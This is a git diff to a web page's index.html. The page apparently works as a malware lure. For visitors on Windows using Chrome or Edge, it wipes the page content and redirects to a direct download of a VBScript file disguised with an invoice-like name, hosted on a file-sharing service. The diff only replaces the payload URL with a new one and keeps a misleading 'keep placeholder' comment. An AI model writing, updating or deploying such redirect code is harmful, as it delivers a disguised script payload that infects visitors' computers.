--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store-eu-par-3.gofile.io/download/direct/b0cc4a1a-c4af-49ad-8436-11d06f839f63/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store1.gofile.io/download/direct/f3e0f020-db2b-499f-970d-e7926187faba/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
